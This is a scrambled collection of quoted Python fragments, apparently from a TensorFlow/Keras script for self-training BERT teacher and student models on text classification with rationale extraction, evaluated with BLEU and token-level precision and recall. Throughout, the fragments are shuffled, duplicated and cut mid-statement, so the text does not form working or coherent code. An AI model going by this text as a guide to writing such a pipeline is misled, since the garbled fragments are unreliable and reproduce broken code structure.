max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler,", "logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task):", "task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl' in type_:", "max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_", "score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred", "[y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]])", "temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 +=", "#y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1)", "y_T = None, None, None if 'mtl' in type_: acc, y_pred = model.predict(X_unlabeled_sample,", "'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", "batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = 
model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))])", "= {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]},", "= os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file", "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc >", "= {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc =", "temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p))", "X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input", "type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val =", "out[3], out[4], out[5] logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc))", "import json import nltk import tensorflow as tf 
import tensorflow.keras as K import", "{}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {} with total loss", "os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info (\"Model file loaded from {}\".format(model_file)) break", "model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out", "for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if 'mtl' in", "metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ == 'joint': rat_loss = None if 'focal'", "if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev,", "np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "{}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc =", "in type_: if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc =", "= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X,", "verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev =", "[1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 
'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs,", "rationales on test set (teacher model): {} \".format(score4/len(pred))) best_loss = np.inf data =", "#logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss", "0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0,", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"])))", "type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0]", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with", "= {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or", "0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 
'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:]", "class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for run", "acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch,", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights =", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc", "= task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0],", "{}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing", "X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev =", "rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = 
tf.nn.softmax(X_conf[:,1:],", "in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights", "token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro')))", "y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model", "y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred =", "labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0],", "== 'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "dict() temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split())", "#X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] '''", "np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): 
if 'mtl' in type_:", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev,", "kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance':", "= np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask", "for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch", "out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0],", "model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train,", "in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in", "\"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc = acc[:,None] y_batch =", "ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r", 
"dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_", "logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\")", ": y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev,", "\".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3", "= [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text']", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "import BinaryFocalLoss, SparseCategoricalFocalLoss import random from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support", "'_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_:", "{}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to", "y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), 
batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss',", "pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction", "((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0", "sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25,", "{}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'],", "X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": 
X[\"input_ids\"][train_size:],", "range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None if", "for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5]))", "'.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word)", "in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_:", "import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss", "max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] =", "0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j])", "= np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from", "np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r if", "y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test =", "elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task)", "= np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc", "\"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev 
= {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\":", "in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None", "model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model): {}", "= y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run {}:", "{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ == 'decoupled' or ('joint'", "'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all self-training", "1) else: res = max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler", "X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices],", "y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled", "type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)):", "batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, 
restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg'", "acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out =", "from sklearn.metrics import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5,", ": {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0]", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation", "model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus,", "y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at", "out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))])", "verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev,", "= [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on", "logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc)) logger.info (\"Val", "= 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input for", "acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out", "+= test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t))", "axis=-1) 
#.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled,", "\"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file", "np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc", "{} : {}\".format(counter, val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss =", "\"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\":", "y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0],", "tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70,", "'joint': logger.info(type_) def custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "train_size = int((1. 
- valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\":", "average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing", "None # model_task for epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_", "\"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev", "0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i", "X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels))", "elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size],", "= out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher", "= int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: 
indx = indx[:unsup_size] logger.info(\"Shape of predicted", "model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model): {}", "unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices]", "task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp'", "{\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] =", "prediction data on student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp", "y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]),", "{}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0,", "#l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred):", "y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] elif", "model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 